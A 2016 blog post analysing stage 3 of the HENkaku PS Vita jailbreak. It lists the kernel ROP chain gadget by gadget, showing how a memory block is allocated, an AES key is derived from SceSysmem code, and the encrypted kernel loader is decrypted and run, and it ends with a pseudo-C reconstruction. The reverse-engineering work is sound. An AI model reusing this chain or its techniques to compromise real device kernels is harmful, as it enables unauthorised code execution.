Wednesday, October 19, 2016

HENkaku - Exploit teardown - Stage 3

Here it is, Stage 3, the last stage of HENkaku.
This was by far the toughest to crack, so, let's dive in!

HENkaku - Stage 3

In Stage 2, we analyzed how HENkaku exploits two distinct kernel bugs to achieve code execution: a memory leak bug (in the sceIoDevctl function) to defeat KASLR and a use-after-free (in the sceNetIoctl function) to break into the kernel and do ROP.
However, since the execution flow switches over to a ROP chain planted into the kernel, we still couldn't figure out what was happening next.

Like I mentioned in the previous write-up's ending note, dumping the kernel (more specifically, the SceSysmem module) was now necessary. Team molecule did not provide any additional vulnerability that we could use for this purpose, so, it was up to the participants to figure it out themselves.

I had already found a potential memory leak vulnerability while playing around with Stage 2 but, unfortunately, due to it's nature (out-of-bounds read) it wasn't enough to reach the SceSysmem module.
Frustrated, I began looking for other plausible entry-points. It took me several attempts and required analyzing several key components of the Vita's system:
- Network:
    The SceNet module was the origin of the use-after-free and I had already an OOB read there, so, what else could be in there?
- Filesystem:
    The SceDriverUser module exposes a decent amount of unique system calls for the filesystem. Some of them crash. Can I leak memory here?
- Audio:
    Developers don't pay much attention to security when it comes to implement media handling. Some specific audio handling features are taken care by the kernel itself. Can I compromise it?
- Graphics:
    Just like with audio, graphics are a common source of flaws. The Vita has plenty of libraries with unique system calls for this (SceGpuEs4User, SceGxm, ScePaf). Will this help?
- Application:
    User applications are managed by modules that heavily communicate with the kernel (SceAppUtil and SceDriverUser via SceAppMgr calls). Perhaps this can be taken down?
Eventually, one of those gave me what I wanted and I was able to dump the entire Vita's kernel memory. After locating the SceSysmem module among the dumped binaries I became able to solve the rest of the challenge.
On a side note, I did attempt blind ROP at first by relocating a few gadgets and taking wild guesses, but team molecule made sure it wouldn't be that easy. The gadgets' placement makes it very difficult to predict what each one will do.

Anyway, here is the result:
// Kernel ROP chain
scesysmem_base + 0x00000347
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803 // R0
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1 // PC
scesysmem_base + 0x0001EFF1
LSLS R0, R0, #1 -> R0 is 0x1020D006
0x00(x_stack + 0x00008A98) = 0x00000038 // R3
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is 0x1020D006
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571 // PC
scesysmem_base + 0x0001B571
LSLS R2, R0, #5 -> R2 is 0x041A00C0
0x00(x_stack + 0x00008AAC) = 0x00000000 // R3
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43 // PC
scesysmem_base + 0x00001E43
AND.W R2, R2, #0xF0000 -> R2 is 0x041A00C0 & 0xF0000 = 0xA0000
CMP.W R2, #0x40000
BEQ loc_AB1E50
MOVS R0, #0
POP {R3-R5,PC}
0x00(x_stack + 0x00008AB4) = 0x00000000 // R3
0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D // R4
0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73 // R5
0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913 // R0
0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523 // PC
// Allocate kernel memblock (scesysmem_base + 0x00027913 == "Magic")
// kern_memblock_alloc("Magic", 0x1020D006, 0xA0000, 0x00000000, 0x00000000);
scesysmem_base + 0x0000A523
MOVS R4, #0
SUB SP, SP, #8
STR R4, [SP,#0x10+var_10]
BL sub_A6A384 // kern_memblock_alloc
ADD SP, SP, #8
0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3 // PC
scesysmem_base + 0x00000CE3
POP {R4-R7,PC}
0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067 // R6
0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F // R7
0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713 // PC
scesysmem_base + 0x00019713
ADD R3, SP, #0x28 -> Will modify stack!
scesysmem_base + 0x0000587F
MOVS R2, R0 -> R2 is memblock_id
0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605 // R4
0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D // PC
scesysmem_base + 0x00001E1D
MOV R0, R3 -> R3 is out_buf
0x00(x_stack + 0x00008AF0) = 0x00000000 // R4
0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is out_buf
0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603 // PC
scesysmem_base + 0x00001603
MOV R0, R2 -> R0 is memblock_id
0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1 // R3
0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17 // PC
// Call kern_memblock_getaddr(memblock_id, out_buf);
// out_buf contains the memblock's base address
scesysmem_base + 0x00001F17
BL sub_A61EC8 // kern_memblock_getaddr
0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031 // PC
scesysmem_base + 0x00000031
0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913 // R0 -> memblock_addr
0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61 // PC
scesysmem_base + 0x00023B61
MOV R7, R0 -> R7 is memblock_addr
MOVT R0, 0x8002
0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB // PC
scesysmem_base + 0x000232EB
MOVS R0, #8
0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571 // PC
scesysmem_base + 0x0001B571
LSLS R2, R0, #5 -> R2 is (0x08 << 0x05) = 0x100
0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61 // R3
0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1 // PC
scesysmem_base + 0x000232F1
MOVS R0, #0x80
0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411 // R3
0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1 // PC
scesysmem_base + 0x00000AE1
MOVS R1, R0 -> R1 is 0x80
0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411 // PC
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008B48) = 0x00000090 // R4
0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11 // PC
scesysmem_base + 0x00012B11
ADDS.W R0, R0, R4,LSL#2 -> R0 is memblock_addr + 0x240
BEQ loc_A72ADE
ADD SP, SP, #8
0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3 // SP
0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1 // SP + 0x04
0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x240 ^ 0x40) = memblock_addr + 0x200
0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5 // PC
scesysmem_base + 0x0001FDC5
MOV R3, LR -> R3 is scesysmem_base + 0x000039EB + 0x02
BLX R4 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB // PC
// AES_setkey(keybuf, type, size, key, 0);
// Call sub_A7D544(memblock_addr + 0x240, 0x80, 0x100, scesysmem_base + 0x39EB + 0x02, 0x00000000);
scesysmem_base + 0x0001D8DB
MOVS R4, #0
SUB SP, SP, #8
STR R4, [SP]
BL sub_A7D544
ADD SP, SP, #8
0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399 // R4
0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is memblock_addr + 0x200
MOV R1, R4 -> R1 is scesysmem_base + 0x00019399
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x00000347
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x200 ^ 0x40) = memblock_addr + 0x240
0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F // R3
0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is memblock_addr + 0x240
MOV R1, R4 -> R1 is scesysmem_base + 0x00019399
LDR R2, [SP,#0x38+var_30] -> R2 is 0x00000000
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (memblock_addr + 0x240 ^ 0x40) = memblock_addr + 0x200
0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913 // PC
scesysmem_base + 0x0000B913
MOVS R6, R0 -> R6 is memblock_addr + 0x240
ADD R0, R4 -> R0 is memblock_addr + 0x240 + scesysmem_base + 0x00019399
ADD R1, R2 -> R1 is scesysmem_base + 0x00019399 + 0x00000000
CMP R0, R1
MOVHI R0, #0 -> R0 is always bigger than R1 (likely a workaround gadget)
MOVLS R0, #1
ADD SP, SP, #8
0x00(x_stack + 0x00008B8C) = 0x00000000 // SP
0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1 // SP + 0x04
0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861 // PC
scesysmem_base + 0x00001861
MOVS R0, #0 -> R0 is 0
0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D // R3
0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x00 ^ 0x40) = 0x40
0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x40
MOV R1, R4 -> R1 is scesysmem_base + 0x00000347
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x00000347
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x40 ^ 0x40) = 0x00
0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x00
MOV R1, R4 -> R1 is scesysmem_base + 0x00000347
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x0001614D
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x0001F2B1
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x00 ^ 0x40) = 0x40
0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D // PC
scesysmem_base + 0x0001614D
ADDEQ R0, #0x10 -> R0 is 0x40 + 0x10 = 0x50
0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3 // R3
0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1 // PC
scesysmem_base + 0x0001F2B1
EOR.W R9, R0, 0x40 -> R9 is (0x50 ^ 0x40) = 0x10
0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF // PC
scesysmem_base + 0x000000AF
NEGLS R0, R0 -> R0 is ~(0x10) = 0xFFFFFFF0
0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605 // R3
0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1 // PC
scesysmem_base + 0x0001EFE1
MOV R1, R0 -> R1 is 0xFFFFFFF0
0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347 // PC
scesysmem_base + 0x00001347
MOV R2, R0 -> R2 is memblock_addr
0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9 // PC
scesysmem_base + 0x000000B9
SUBS R0, R2, R1 -> R0 is memblock_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1 // R3
0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347 // PC
scesysmem_base + 0x00001347
MOV R2, R0 -> R2 is memblock_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B // PC
scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C04) = kx_loader_addr // R4
0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95 // PC
scesysmem_base + 0x0001CB95
SUBS R1, R4, R1 -> R1 is kx_loader_addr - 0xFFFFFFF0
0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93 // PC
scesysmem_base + 0x0001EA93
MOV R0, R6 -> R0 is memblock_addr + 0x240
0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411 // PC
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7 // R5
0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3 // PC
scesysmem_base + 0x000209D3
STR R5, [SP,#0x0C]
LDR R5, [SP,#0x38]
STR R5, [SP,#0x10]
BLX R4 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411 // PC -> SP
scesysmem_base + 0x00001411
POP {R4,R5,PC}
0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347 // R4 -> SP + 0x04
0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5 // R5 -> SP + 0x08
0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605 // PC -> SP + 0x0C -> scesysmem_base + 0x000209D7
scesysmem_base + 0x000209D7
STR R5, [SP,#0x10]
BLX R4 -> scesysmem_base + 0x00000347
ADD SP, SP, #0x1C
POP {R4,R5,PC}
0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347 // PC -> SP + 0x10 -> scesysmem_base + 0x0000652B
scesysmem_base + 0x0000652B
ADD SP, SP, #0xC
0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B // SP
0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347 // SP + 0x04
0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5 // SP + 0x08
0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49 // PC -> SP + 0x10 -> scesysmem_base + 0x0001BAF5
scesysmem_base + 0x0001BAF5
// AES_decrypt
// Call sub_A7BAF4(memblock_addr + 0x240, kx_loader_addr - 0xFFFFFFF0, memblock_addr - 0xFFFFFFF0);
// Decrypt kx_loader_addr + 0x10 into memblock_addr + 0x10
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0 // SP
0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B // SP + 0x04
0x00(x_stack + 0x00008C4C) = 0x00000040 // SP + 0x08
0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49 // SP + 0x0C
0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347 // SP + 0x10
0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B // SP + 0x14 -> SP + 0x38
0x00(x_stack + 0x00008C5C) = scesysmem_base + 0x00000347 // SP + 0x18
0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B // R4 -> SP + 0x1C
0x00(x_stack + 0x00008C64) = 0x00000040 // R5
0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB // PC
scesysmem_base + 0x0001D9EB
ADD R2, SP, #0xBC -> R2 is SP + 0xBC
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB // R0
0x00(x_stack + 0x00008C80) = 0x00000038 // R1
0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB // PC
scesysmem_base + 0x000000AB
SUBS R2, R2, R1 -> R2 is SP + 0xBC - 0x38 = SP + 0x84
0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1 // R3
0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B // PC
scesysmem_base + 0x0002328B
MOV R1, R2 -> R1 is SP + 0x84
0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD // R4
0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1 // PC
scesysmem_base + 0x000000D1
MOV R4, R1 -> R4 is SP + 0x84
0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1 // R3
0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117 // PC
scesysmem_base + 0x0002A117
POP {R2,R5,PC}
0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347 // R2
0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605 // R5
0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399 // PC
scesysmem_base + 0x00019399
MOV R0, R9 -> R0 is 0x10
MOV R1, R4 -> R1 is SP + 0x84
LDR R2, [SP,#0x38+var_30] -> R2 is scesysmem_base + 0x0001BF1F
MOVS R3, #0 -> R3 is 0x00000000
BLX R5 -> R5 is scesysmem_base + 0x00001605
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347 // R3 -> SP
0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB // PC -> SP + 0x04
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F // PC -> SP + 0x08
scesysmem_base + 0x0001BF1F
MOV R2, R4 -> R2 is SP + 0x84
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0 // R3
0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B // PC
scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000240 // R4
0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49 // PC
scesysmem_base + 0x00022A49
SUBS R0, R0, R4 -> R0 is 0x10 - 0x240
0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB // R4
0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73 // PC
scesysmem_base + 0x00003D73
MOVNE R0, R3 -> R0 is 0xFFFFFEB0
MOVEQ R0, #0
0x00(x_stack + 0x00008CD0) = 0x00000000 // R3
0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD // PC
scesysmem_base + 0x000021FD
ADD R0, R2 -> R0 is 0xFFFFFEB0 + SP + 0x84 = SP - 0xCC
CMP R3, #0 -> R3 is 0x00000000
BNE loc_A621E2
POP {R4}
0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9 // R3
0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1 // PC
scesysmem_base + 0x00000AE1
MOVS R1, R0 -> R1 is SP - 0xCC
0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117 // PC
scesysmem_base + 0x0002A117
POP {R2,R5,PC}
0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347 // R2
0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1 // R5
0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067 // PC
// Branch to kx_loader
scesysmem_base + 0x00000067
MOV SP, R1 -> SP is SP + 0x90
BLX R2 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB // R3
0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47 // PC
scesysmem_base + 0x0001BF47
MOVNE R1, #0
0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33 // PC
scesysmem_base + 0x0000AF33
MOV R4, R1 -> R4 is 0
MOV R5, R0 -> R5 is memblock_addr
BL sub_A7FBA8
MOV R1, R5 -> R1 is memblock_addr
MOV R2, R4 -> R2 is 0
MOVS R3, #0 -> R3 is 0
BL sub_A6CF34
POP {R3-R5,PC}
0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB // R4
0x00(x_stack + 0x00008D14) = second_payload // R5
0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D // PC
scesysmem_base + 0x0001FC6D
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73 // PC
scesysmem_base + 0x0000EA73
MOV R3, R0 -> R3 is memblock_addr
0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B // R4
0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF // R0
0x00(x_stack + 0x00008D2C) = 0x08106803 // R1
0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3 // PC
scesysmem_base + 0x000233D3
LSLS R2, R1, #1 -> R2 is (0x08106803 << 0x01) = 0x1020D006
0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347 // R4
0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433 // PC
scesysmem_base + 0x00000433
SUBS R1, R2, #1 -> R1 is (0x1020D006 - 0x01) = 0x1020D005
ANDS R0, R1 -> R0 is (0xFFFFFFFF & 0x1020D005) = 0x1020D005
BEQ loc_A60440
CLZ.W R0, R0 -> R0 is 3
SUB.W R4, R3, R0,LSR#3 -> R4 is (memblock_addr - 0x03) >> 0x03
SUBS R0, R4, #1 -> R0 is ((memblock_addr - 0x03) >> 0x03) - 0x01
0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3 // R4
0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3 // PC
scesysmem_base + 0x000150A3
MOV R0, R3 -> R0 is memblock_addr
0x00(x_stack + 0x00008D44) = 0x00000000 // R3
0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D // PC
scesysmem_base + 0x0000A74D
sub_A6A74C(memblock_addr, 0x1020D005);
0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000 // R4
0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853 // PC
scesysmem_base + 0x00000853
POP {R0,R1,PC}
0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F // R0
0x00(x_stack + 0x00008D58) = 0x00000200 // R1
0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347 // R3
0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9 // PC
scesysmem_base + 0x000050E9
MOV R0, R7 -> R0 is memblock_addr
BLX R3 -> scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605 // PC
scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD // R3
0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB // PC
scesysmem_base + 0x000039EB
BLX R3 -> scesysmem_base + 0x00022FCD
scesysmem_base + 0x00022FCD
kern_flush_cache(memblock_addr, 0x00000200); // sub_A82FCC
0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853 // R3
0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F // PC
scesysmem_base + 0x00011C5F
BLX R7 -> Jump to memblock_addr

So, random comments and mistakes aside, this gives us a clear view of what the kernel ROP chain is doing:
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer
uint32_t *out_buf;
kern_memblock_getaddr(memblock_id, out_buf);
// Read out the address
uint32_t memblock_addr = (uint32_t)out_buf[0];
// Generate AES-256-ECB key using SceSysmem code!
void* k_buf = (void *)memblock_addr + 0x240; // Output buffer to store the key
uint32_t key_type = 0x80; // Key type?
uint32_t key_size = 0x100; // Key size (0x80 is 128-bit, 0x100 is 256-bit)
void* key = (void *)scesysmem_base + 0x39EB + 0x02; // The key is code!
uint32_t mode = 0x00000000; // Encryption mode (0 is ECB, 1 is CBC, 2 is CFB1)
AES_setkey(k_buf, key_type, key_size, key, mode);
// Decrypt the HENkaku's kernel loader
void *in_buf = (void *)kx_loader_addr + 0x10;
void *out_buf = (void *)memblock_addr + 0x10;
AES_decrypt(k_buf, in_buf, out_buf);
// Execute the kx_loader
// Clean up?
sce_sysmemfordriver_call0(memblock_addr, 0, 0, 0);
sce_sysmemfordriver_call1(memblock_addr, 0x1020D005);
// Probably cache flush
sce_cpufordriver_call0(memblock_addr, 0x00000200);

If you recall, the kernel loader was an encrypted chunk of 0x100 bytes that was appended to the bottom of the ROP chain we copy into a kernel stack using sceIoDevctl:
  • // NULLs for padding at the bottom of the chain
    0x00(x_stack + 0x00008D7C) = 0x00000000;
    0x00(x_stack + 0x00008D80) = 0x00000000;
    0x00(x_stack + 0x00008D84) = 0x00000000;

    // Code starts here
    0x00(x_stack + 0x00008D88) = ...;

The kernel ROP decrypts this chunk using AES-256-ECB and the key is a piece of code from SceSysmem itself.
This is what the kernel loader looks like (note that base offset is set to 0x00000000):

// Entry point
sub_00000010(scesysmem_base, payload_addr)
r4 = scesysmem_base
r5 = scesysmem_base >> 0x20
// Decrypt and launch HENkaku's payload
sub_00000020(scesysmem_base, payload_addr);
// Decrypt and launch HENkaku's payload
sub_00000020(scesysmem_base, payload_addr)
sp = (sp - 0x1C)
r4 = 0
r8 = sp + 0x18
r7 = scesysmem_base + 0xA500
r5 = scesysmem_base
